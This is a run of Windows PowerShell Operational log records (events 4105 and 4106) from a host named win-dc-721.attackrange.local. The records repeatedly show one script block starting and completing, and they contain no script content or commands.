Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473691
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473690
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473689
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473688
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473687
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473686
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473685
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473684
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473683
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473682
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473681
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473680
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473679
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473678
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473677
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473676
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473675
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473674
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473673
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473672
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473671
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473670
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473669
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473668
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473667
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473666
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473665
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473664
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473663
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473662
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473661
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473660
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473659
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473658
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473657
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473656
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473655
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473654
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473653
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473652
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473651
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473650
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473649
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473648
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473647
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473646
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473645
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473644
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473643
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473642
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473641
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473640
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473639
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473638
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473637
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
